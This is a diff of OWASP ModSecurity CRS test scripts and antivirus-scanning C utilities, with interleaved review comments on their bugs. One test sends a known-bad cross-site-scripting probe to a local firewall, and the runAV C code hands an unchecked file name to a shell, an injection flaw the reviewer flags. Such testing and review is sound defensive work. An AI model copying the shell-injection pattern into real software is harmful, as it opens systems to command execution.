Mac OS X 10_6_2; en-ca) +libwww-perl/5.820 +msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) +msnbot/0.11 ( http://search.msn.com/msnbot.htm) +msnbot/1.0 ( http://search.msn.com/msnbot.htm) +msnbot/1.1 ( http://search.msn.com/msnbot.htm) +nook browser/1.0 +portalmmm/2.0 N410i(c20;TB) +w3m/0.5.1 +w3m/0.5.1 +wii libnup/1.0 diff --git a/nginx/config/owasp-crs/tests/regression/utils/testSampling.py b/nginx/config/owasp-crs/tests/regression/utils/testSampling.py new file mode 100644 index 00000000..5d3b7e9b --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/utils/testSampling.py 
@@ -0,0 +1,46 @@ +from ftw import ruleset, http, errors + +""" +This script assumes that default blocking action is 403 +and sampling is one. It will send a know bad request +that is expected to be blocked. If sampling is on it +will only block a certain percentage. We send 1000 +requests to verify this. In order to do this we must +also turn off IP Reputation blocking. +SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" +""" +def send_requests(input_data,subiters,result,index): + http_ua = http.HttpUA() + for i in range(0,subiters): + new_index = str(index)+str(i) + http_ua.send_request(input_data) + result[new_index] = http_ua.response_object.status +def run_requests(iterations): + """Post request with no content-type AND no content-length""" + x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X=">',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"}) + import threading + returns = {} + threads = [] + for i in range(5): + t = threading.Thread(target=send_requests,args=(x,100, returns,i,)) + threads.append(t) + t.start() + for t in threads: + t.join() + status_not_403 = 0 + status_403 = 0 + for status in returns.values(): + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(returns)*1.0))*100 + y = (status_not_403/(len(returns)*1.0))*100 + print "403s =", x + print "not 403s =", y + return (x,y) + +def test_sampling(): + print "running" + block,passed = run_requests(100) + assert block < 55 and block > 45 diff --git a/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py b/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py new file mode 100644 index 00000000..9d25266f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/utils/testUserAgents.py 
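Review bot: `run_requests(iterations)` never reads `iterations`: the load is fixed by `for i in range(5)` and `args=(x,100, returns,i,)`, so `test_sampling`'s `run_requests(100)` sends 500 requests while the module docstring says 1000, and the `block < 55 and block > 45` window is tied to neither figure. Derive the per-thread count from the argument, `per_thread = iterations // 5`, pass `per_thread` in place of the literal `100`, and call it with the count the docstring promises. The docstring on `run_requests`, `"""Post request with no content-type AND no content-length"""`, describes a different test; `"""Send a known-bad GET from 5 threads and return the (blocked %, passed %) split."""` matches what the code does. `print "403s =", x` is Python 2 syntax, so the file will not import under Python 3 — `print("403s =", x)` works in both. The `uri=` literal looks truncated in this rendering, so the payload itself was not reviewed.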
@@ -0,0 +1,37 @@ +from ftw import ruleset, http, errors + +""" +This script reads in a list of popular Useragents and checks to see if it triggers +It expects 403's to be returned for a rule firing +""" + +def read_useragents(filename): + f = open(filename,'r') + useragents = [agent.strip() for agent in f.readlines()] + return useragents + +def run_requests(useragent_list): + status_not_403 = 0 + status_403 = 0 + for useragent in useragent_list: + # get me a counter while i'm waiting + if (status_not_403 + status_403)%15 == 0: + print("Send",status_not_403 + status_403, "Out of",len(useragent_list)) + input_data = ruleset.Input(method="GET", protocol="http",port=80,uri='/',dest_addr="localhost",headers={"Host":"localhost","User-Agent":useragent}) + http_ua = http.HttpUA() + http_ua.send_request(input_data) + status = http_ua.response_object.status + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(useragent_list)*1.0))*100 + y = (status_not_403/(len(useragent_list)*1.0))*100 + print "403s =", x + print "not 403s =", y + + +def main(): + uas = read_useragents('./data/popularUAs.data') + run_requests(uas) +main() diff --git a/nginx/config/owasp-crs/util/README b/nginx/config/owasp-crs/util/README new file mode 100644 index 00000000..d9aa66dd --- /dev/null +++ b/nginx/config/owasp-crs/util/README @@ -0,0 +1,7 @@ +The util directory contains many supporting tools/scripts that may be used with +the OWASP ModSecurity CRS files. + +Docker Support +============== +A Dockerfile can be found in the docker/ directory, along with additional +notes in docker/README.md diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/common.c b/nginx/config/owasp-crs/util/av-scanning/runAV/common.c new file mode 100755 index 00000000..08d21289 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/common.c 
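Review bot: `main()` is called unconditionally at module level, so importing or collecting this file (its name starts with `test`) fires every request in `./data/popularUAs.data` at `localhost:80`; put the call behind an `if __name__ == '__main__':` guard. `read_useragents` opens the file and never closes it, and pulls it all in with `readlines()` — a `with` block iterating the handle does both jobs. The file mixes `print("Send", ...)` with `print "403s =", x`, so it runs only on Python 2; the statement forms should become calls. `run_requests` computes and prints the percentages but returns nothing, unlike `run_requests` in testSampling.py, which returns the `(x, y)` pair.
```python
def read_useragents(filename):
    """Return each line of filename with surrounding whitespace stripped."""
    with open(filename, 'r') as f:
        return [agent.strip() for agent in f]

# … unchanged: run_requests (with print(...) calls) …

def main():
    uas = read_useragents('./data/popularUAs.data')
    run_requests(uas)

if __name__ == '__main__':
    main()
```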
@@ -0,0 +1,652 @@ +#include "common.h" + +int lock_file(char *filename) +{ + int fd; + + if (!filename) + return -1; + + if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { + print_error("lock_file","open",modsec_rpc_log_file,errno); + return -1; + } + + flock(fd,LOCK_EX); + + return fd; +} + +int unlock_file(int fd) +{ + flock(fd,LOCK_UN); + return 0; +} + +int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) +{ + char time_str[64], line[1024*1024]; + time_t t; + int fd; + int i; + + switch (atoi(modsec_rpc_log_level)) { + case DEBUG: + time(&t); + ctime_r(&t,time_str); + time_str[strlen(time_str)-1] = '\0'; + if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { + print_error("print_request","open",modsec_rpc_log_file,errno); + fd=2; + } + flock(fd,LOCK_EX); + sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + for (i=0; i 0 && output) output[0]='\0'; + if (!(fp=popen(command,"r"))) { + print_error("run_cmd","popen",command,errno); + return -1; + } + + while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { + strcat(output, line); + output_size -= strlen(line); + } + + if (!output_size) + while (fgets(line,1024,fp)); + + pclose(fp); + return 0; +} + +int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) +{ + int i, idx=-1; + + for (i = 0; (i < max_parameters) && (idx < 0); i++) + if ( strstr(parameters[i].name,parameter_name) ) + idx=i; + return idx; +} + +int parse_file(char *filename, parameter_t *parameters, int max_parameters) +{ + char line[1024], *ptr; + int i; + FILE *fp; + + if (!max_parameters || (parameters == NULL) || (filename == NULL)) { + print_error("parse_file","invalid input 
parameters","none",0); + return 0; + } + + if ((fp = fopen(filename,"r")) == NULL ) { + print_error("parse_file","fopen",filename,errno); + return 0; + } + + i=0; + while ( i < max_parameters && fgets(line,1024,fp)) { + if (ptr = strstr(line,"#")) + *ptr='\0'; + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + continue; + i++; + } + + fclose(fp); + + return i; +} + +int change_file(char *filename, parameter_t parameter) +{ + char line[1024], *name, *value; + int i, found=0; + FILE *fp; + + if (filename == NULL) + return 0; + + if ((fp = fopen(filename,"r+")) == NULL ) + return 0; + + i=0; + while ( fgets(line,1024,fp)) { + sscanf(line,"%[^=]=%s",name,value); + if (name && !strcmp(name,parameter.name)) { + fprintf(fp,"%s=%s\n",name,parameter.value); + found=1; + continue; + } else fprintf(fp,"%s",line); + } + + fclose(fp); + return found; +} + +int copy_file(char *src_file, char *dst_file) +{ + char line[1024]; + FILE *sfp, *dfp; + + if (src_file == NULL || dst_file == NULL) + return 0; + + if ((sfp = fopen(src_file,"r")) == NULL ) + return 0; + + if ((dfp = fopen(dst_file,"w")) == NULL ) { + fclose(sfp); + return 0; + } + + while ( fgets(line,1024,sfp)) + fprintf(dfp,"%s",line); + + fclose(sfp); + fclose(dfp); + return 1; +} + +int parse_query(char *query, parameter_t *parameters, int max_parameters) +{ + char *ptr, *dst_ptr, num[3]; + int i, len; + + if (!max_parameters || (parameters == NULL) || (query == NULL)) + return 0; + + ptr=query; + i=0; + while ((i < max_parameters) && *ptr) { + parameters[i].name[0] = '\0'; + dst_ptr = parameters[i].name; + len=0; + while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_NAME_LENGTH) + while (*ptr && (*ptr != '=')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + 
parameters[i].value[0] = '\0'; + dst_ptr = parameters[i].value; + len=0; + while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_VALUE_LENGTH) + while (*ptr && (*ptr != '&')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + i++; + } + + return i; +} + +int parse_query_and_body (parameter_t *parameters, int max_parameters) +{ + char *query, *content_length_env; + int i, num_of_params, body_len, content_length; + + query = getenv("QUERY_STRING"); + if (query && *query) + return(parse_query(query,parameters,max_parameters)); + else { + content_length_env = getenv("CONTENT_LENGTH"); + if (!content_length_env) + return 0; + if (! *content_length_env) + return 0; + content_length=atol(content_length_env); + if (!(query=malloc(content_length+1))) + return 0; + i = 1; body_len=0; + while ( (body_len < content_length) && (i>0) ) { + i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); + if (i > 0 ) body_len+=i; + } + query[body_len] = '\0'; + num_of_params = parse_query(query,parameters,max_parameters); + free(query); + return num_of_params; + } +} + +int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) +{ + char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; + int i, num_of_params=0; + + if (num_of_args > 0) + for (i=0; i0) ) { + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + if (i > 0 ) reply_len+=i; + } + reply[reply_len] = '\0'; + + shutdown(sock,SHUT_RDWR); + close(sock); + return reply_len; +} + +int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, idx=-1; + + for (i = 0; (i < num_of_ips) && (idx < 0); i++) + if ( strstr(blocklist[i].ip,ip) ) + idx=i; + return idx; +} + +int 
remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, j, idx=-1; + time_t t; + + time(&t); + for (i = 0; i < num_of_ips; i++) + if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { + idx=i; + for (j=i; j<(num_of_ips-1); j++) { + strcpy(blocklist[j].ip,blocklist[j+1].ip); + blocklist[j].start = blocklist[j+1].start; + blocklist[j].duration = blocklist[j+1].duration; + blocklist[j].end = blocklist[j+1].end; + strcpy(blocklist[j].token,blocklist[j+1].token); + } + num_of_ips--; + } + return idx; +} + +int read_conf_file (char *filename) +{ + int idx, num_of_params; + parameter_t parameters[MAX_PARAMS]; + + num_of_params=parse_file(filename,parameters,MAX_PARAMS); + + if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_cli_home,parameters[idx].value); + if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) + 
strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ip,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_port,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_network_prefix,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_bin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_conf,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_nic,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_pid,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_whitelist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_blacklist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_timeout,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXCHANGE",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_exchange,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_IPS",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_ips,parameters[idx].value); + + 
if ((idx = find_param_idx("MODSEC_MUI_UI_ADMIN",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_admin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_PASSWORD_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_password_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_IPADDRESS",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_ipaddress,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_MUI_UI_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_mui_ui_port,parameters[idx].value); + + if ((idx = find_param_idx("SENSOR_ID",parameters,num_of_params)) >= 0) + strcpy(sensor_id,parameters[idx].value); + + if ((idx = find_param_idx("SERIAL",parameters,num_of_params)) >= 0) + strcpy(serial,parameters[idx].value); + + if ((idx = find_param_idx("VERSION_NUMBER",parameters,num_of_params)) >= 0) + strcpy(version_number,parameters[idx].value); + + if ((idx = find_param_idx("RELEASE_DATE",parameters,num_of_params)) >= 0) + strcpy(release_date,parameters[idx].value); + + if ((idx = find_param_idx("BRIDGE_MODE",parameters,num_of_params)) >= 0) + strcpy(bridge_mode,parameters[idx].value); + + if ((idx = find_param_idx("DATA_DISK_SPACE",parameters,num_of_params)) >= 0) + strcpy(data_disk_space,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE",parameters,num_of_params)) >= 0) + strcpy(conn_rate,parameters[idx].value); + + if ((idx = find_param_idx("CONN_RATE_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conn_rate_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("CONNS",parameters,num_of_params)) >= 0) + strcpy(conns,parameters[idx].value); + + if ((idx = find_param_idx("CONNS_PER_ADDR",parameters,num_of_params)) >= 0) + strcpy(conns_per_addr,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY",parameters,num_of_params)) >= 0) + 
strcpy(modsec_proxy,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_SCRIPT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_script,parameters[idx].value); + + return num_of_params; +} + +int init_cgi() +{ + char *modsec; + + setresuid(0,0,0); + setresgid(0,0,0); + + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); + strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); + strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); + strcpy(modsec_rpc_log_level,"0"); + strcpy(modsec_rpc_ssl_lockfile,"/opt/modsecurity-rpc/var/run/ssl.lock"); + strcpy(modsec_rpc_sensor_lockfile,"/opt/modsecurity-rpc/var/run/sensor.lock"); + strcpy(modsec_rpc_externalnic_lockfile,"/opt/modsecurity-rpc/var/run/externalnic.lock"); + strcpy(modsec_rpc_reverseproxy_lockfile,"/opt/modsecurity-rpc/var/run/reverseproxy.lock"); + strcpy(modsec_rpc_mui_lockfile,"/opt/modsecurity-rpc/var/run/mui.lock"); + strcpy(modsec_proxy_home,"/opt/modsecurity-proxy"); + strcpy(modsec_proxy_ip,"127.0.0.2"); + strcpy(modsec_proxy_port,"80"); + strcpy(modsec_proxy_bin,"/bin/modsec-proxyd"); + strcpy(modsec_proxy_script,"/etc/init.d/modsec-proxy"); + strcpy(modsec_proxy_conf,"/etc/httpd.conf"); + strcpy(modsec_proxy_ext_nic,"eth0"); + strcpy(modsec_proxy_network_prefix,"172.16.0.0/12"); + strcpy(modsec_proxy_pid,"/opt/modsecurity-proxy/var/run/httpd.pid"); + strcpy(modsec_proxy_whitelist,"/opt/breach/etc/modsec_whitelist.conf"); + strcpy(modsec_proxy_blacklist,"/opt/breach/etc/modsec_blacklist.conf"); + strcpy(modsec_proxy_timeout,"120"); + strcpy(modsec_proxy_exchange,"/opt/modsecurity-proxy/var/exchange"); + strcpy(modsec_proxy_ext_ips,"/opt/breach/etc/modsec_ips.conf"); + strcpy(modsec_mui_ui_ipaddress,"127.0.0.1"); + strcpy(modsec_mui_ui_port,"443"); + strcpy(modsec_rpc_password_file,"/opt/modsecurity-rpc/etc/.htpasswd"); + strcpy(modsec_mui_ui_admin,"admin"); + strcpy(sensor_id,"1"); + strcpy(serial,"1"); + strcpy(version_number,"2.0"); + strcpy(bridge_mode,"off"); + 
strcpy(data_disk_space,"60"); + strcpy(release_date,"11-15-2006"); + strcpy(conn_rate,"0"); + strcpy(conn_rate_per_addr,"0"); + strcpy(conns,"0"); + strcpy(conns_per_addr,"0"); + + if (modsec = getenv("MODSEC")) + read_conf_file(modsec); + else { + if (!read_conf_file("/opt/breach/etc/modsec.conf")) + read_conf_file("/etc/modsec.conf"); + } + + return 0; +} diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/common.h b/nginx/config/owasp-crs/util/av-scanning/runAV/common.h new file mode 100755 index 00000000..da494107 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/common.h 
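Review bot: `change_file` declares `char *name, *value;` and passes those uninitialised pointers to `sscanf(line,"%[^=]=%s",name,value)`, so every call writes through garbage addresses; they need to be arrays, `char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH];`, with `if (sscanf(line,"%255[^=]=%1023s",name,value) == 2 && !strcmp(name,parameter.name))` replacing the `name &&` test. The same function interleaves `fgets` and `fprintf` on one `"r+"` stream with no intervening `fseek`, which C does not permit, and writes the replacement into the middle of the text it is still reading; writing to a temporary file and renaming is the reliable shape. `find_param_idx` and `find_ip_idx` match with `strstr`, so the `MODSEC_PROXY` lookup in `read_conf_file` hits `MODSEC_PROXY_HOME` if that line comes first and `10.0.0.1` matches `10.0.0.10`; use `strcmp` (trimming trailing whitespace from the scanned name if that is why `strstr` was chosen). `parse_file`'s `%[^=]=%s` has no field widths, so a long config line overflows `parameters[i].name`/`.value` — `"%255[^=]=%1023s"` matches the struct sizes. `init_cgi` ignores the return of `setresuid(0,0,0)`/`setresgid(0,0,0)` and carries on as whatever user it actually is; several bodies (`run_cmd`, `print_request`, `parse_cli`, `send_request`) are truncated in this rendering and could not be reviewed.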
@@ -0,0 +1,99 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAX_PARAMS 256 +#define MAX_IPS 256 +#define MAX_NAME_LENGTH 256 +#define MAX_VALUE_LENGTH 1024 +#define MAX_CMD_LENGTH 1024 +#define MAX_TOKEN_LENGTH 1024 +#define MAX_OUTPUT_LINE_LEN (1024) +#define MAX_OUTPUT_SIZE (MAX_OUTPUT_LINE_LEN*1024) +#define WHITE 1 +#define BLACK 0 +#define NONE 0 +#define DEBUG 1 + +typedef struct { + char name[MAX_NAME_LENGTH]; + char value[MAX_VALUE_LENGTH]; +} parameter_t; + +typedef struct { + char ip[16]; + time_t start; + long duration; + time_t end; + char token[MAX_TOKEN_LENGTH]; +} blocklist_t; + +EXTERN int lock_file(char *filename); +EXTERN int unlock_file(int fd); +EXTERN int print_reply(char *reply); +EXTERN int print_error(char *func1, char* func2, char* str, int err); +EXTERN int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int print_request_force(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask); +EXTERN int is_proxy_up(); +EXTERN int run_cmd(char *command, char *output, int output_size); +EXTERN int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]); +EXTERN int parse_query_and_body(parameter_t *parameters, int max_parameters); +EXTERN int parse_query(char *query, parameter_t *parameters, int max_parameters); +EXTERN int parse_file(char *filename, parameter_t *parameters, int max_parameters); +EXTERN int copy_file(char *src_file, char *dst_file); +EXTERN int change_file(char *filename, parameter_t parameter); +EXTERN int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters); +EXTERN int init_cgi(); +EXTERN int send_request(char *request,char *ip,char *port,char *reply,int max_reply_size); +EXTERN int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips); +EXTERN int remove_ip_idx(char *ip, blocklist_t 
*blocklist, int num_of_ips); + +EXTERN char modsec_rpc[1024]; +EXTERN char modsec_rpc_home[1024]; +EXTERN char modsec_rpc_log_file[1024]; +EXTERN char modsec_rpc_log_level[1024]; +EXTERN char modsec_rpc_ssl_lockfile[1024]; +EXTERN char modsec_rpc_externalnic_lockfile[1024]; +EXTERN char modsec_rpc_sensor_lockfile[1024]; +EXTERN char modsec_rpc_reverseproxy_lockfile[1024]; +EXTERN char modsec_rpc_mui_lockfile[1024]; +EXTERN char modsec_proxy[1024]; +EXTERN char modsec_proxy_home[1024]; +EXTERN char modsec_proxy_script[1024]; +EXTERN char modsec_proxy_ip[1024]; +EXTERN char modsec_proxy_port[1024]; +EXTERN char modsec_proxy_bin[1024]; +EXTERN char modsec_proxy_conf[1024]; +EXTERN char modsec_proxy_ext_nic[1024]; +EXTERN char modsec_proxy_pid[1024]; +EXTERN char modsec_proxy_whitelist[1024]; +EXTERN char modsec_proxy_blacklist[1024]; +EXTERN char modsec_proxy_network_prefix[1024]; +EXTERN char modsec_proxy_timeout[1024]; +EXTERN char modsec_proxy_exchange[1024]; +EXTERN char modsec_proxy_ext_ips[1024]; +EXTERN char modsec_rpc_password_file[1024]; +EXTERN char modsec_mui_ui_admin[1024]; +EXTERN char modsec_mui_ui_ipaddress[1024]; +EXTERN char modsec_mui_ui_port[1024]; +EXTERN char modsec_cli_home[1024]; +EXTERN char sensor_id[1024]; +EXTERN char serial[1024]; +EXTERN char version_number[1024]; +EXTERN char bridge_mode[1024]; +EXTERN char data_disk_space[1024]; +EXTERN char release_date[1024]; +EXTERN char conn_rate[1024]; +EXTERN char conn_rate_per_addr[1024]; +EXTERN char conns[1024]; +EXTERN char conns_per_addr[1024]; diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/comp b/nginx/config/owasp-crs/util/av-scanning/runAV/comp new file mode 100755 index 00000000..aeee5db5 --- /dev/null +++ b/nginx/config/owasp-crs/util/av-scanning/runAV/comp @@ -0,0 +1,2 @@ +gcc -c -o common.o -DEXTERN= common.c +gcc -o runAV -DEXTERN=extern common.o runAV.c 
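Review bot: The header has no include guard and relies on the build line to define `EXTERN` (`comp` passes `-DEXTERN=` for common.c and `-DEXTERN=extern` for runAV.c); wrap it in `#ifndef COMMON_H` / `#define COMMON_H` / `#endif` and add `#ifndef EXTERN` / `#define EXTERN extern` / `#endif` so a translation unit that includes it without the flag still gets declarations rather than definitions. The `#include` targets are stripped in this rendering, so which system headers are pulled in cannot be verified here. `blocklist_t.ip[16]` holds only a dotted-quad IPv4 address plus NUL; a comment on that field, `/* IPv4 dotted quad only, NUL-terminated */`, would stop someone storing IPv6 text there.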
diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c
new file mode 100755
index 00000000..c3526ad8
--- /dev/null
+++ b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV-clamd.c
@@ -0,0 +1,48 @@
+#include "common.h"
+
+main(int argc, char *argv[])
+{
+ char cmd[MAX_OUTPUT_SIZE];
+ char output[MAX_OUTPUT_SIZE];
+ int error;
+ char *colon;
+ char *keyword;
+
+ if (argc > 1) {
+ sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]);
+ output[0] = '\0';
+ error = run_cmd(cmd,output,MAX_OUTPUT_SIZE);
+ if (error != 0) {
+ printf ("1 exec error %d: OK", error);
+ } else if (!*output) {
+ printf ("1 exec empty: OK");
+ }
+ else {
+ colon = strstr(output, ":");
+ if (colon) { colon += 2; }
+ if (!colon) {
+ printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
+ }
+ else if (keyword = strstr(colon, " FOUND")) {
+ *keyword = '\0';
+ printf ("0 clamdscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, " ERROR")) {
+ *keyword = '\0';
+ printf ("0 clamdscan: %s", colon);
+ }
+ else if (keyword = strstr(colon, "OK")) {
+ printf ("1 clamdscan: OK");
+ }
+ else if (keyword = strstr(colon, "Empty file")) {
+ printf ("1 empty file");
+ }
+ else if (keyword = strstr(colon, "Can't access file ")) {
+ printf ("0 invalid file %s", keyword+18);
+ }
+ else {
+ printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd);
+ }
+ }
+ }
+}
diff --git a/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c
new file mode 100755
index 00000000..7d74d2e1
--- /dev/null
+++ b/nginx/config/owasp-crs/util/av-scanning/runAV/runAV.c
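Review bot: `sprintf (cmd, "/usr/bin/clamdscan --no-summary %s", argv[1])` feeds `argv[1]` into `run_cmd`, which in common.c runs the string through `popen` and therefore `/bin/sh`; a file name containing shell metacharacters is re-parsed as commands, and nothing bounds the copy into `cmd`. ModSecurity normally passes its own temp-file path, so the practical exposure is a hand-run or misconfigured invocation, but the cheap fix is to refuse anything that is not a plain absolute path and to use `snprintf`; running the scanner via `fork`/`execv` with a pipe instead of a shell would remove the issue entirely. `main` is declared without a return type and never returns a value — `int main(int argc, char *argv[])` and `return 0;`. `cmd` and `output` put 2 MiB of automatic storage on the stack; making them `static` (or sizing `cmd` at `MAX_CMD_LENGTH`) avoids depending on the stack limit. runAV.c in the next hunk is the same program with `clamscan` and has the identical defects.
```c
int main(int argc, char *argv[])
{
    static char cmd[MAX_OUTPUT_SIZE];
    static char output[MAX_OUTPUT_SIZE];   /* 1 MiB each: keep off the stack */
    /* … unchanged: error, colon, keyword … */

    if (argc > 1) {
        /* run_cmd() hands cmd to /bin/sh: only accept an absolute path made of
           characters the shell cannot interpret, and never overrun cmd */
        if (argv[1][0] != '/' ||
            strspn(argv[1], "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-/") != strlen(argv[1])) {
            printf ("0 invalid file name");
            return 0;
        }
        snprintf (cmd, sizeof cmd, "/usr/bin/clamdscan --no-summary %s", argv[1]);
        /* … unchanged: run_cmd call and output parsing … */
    }
    return 0;
}
```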
@@ -0,0 +1,48 @@
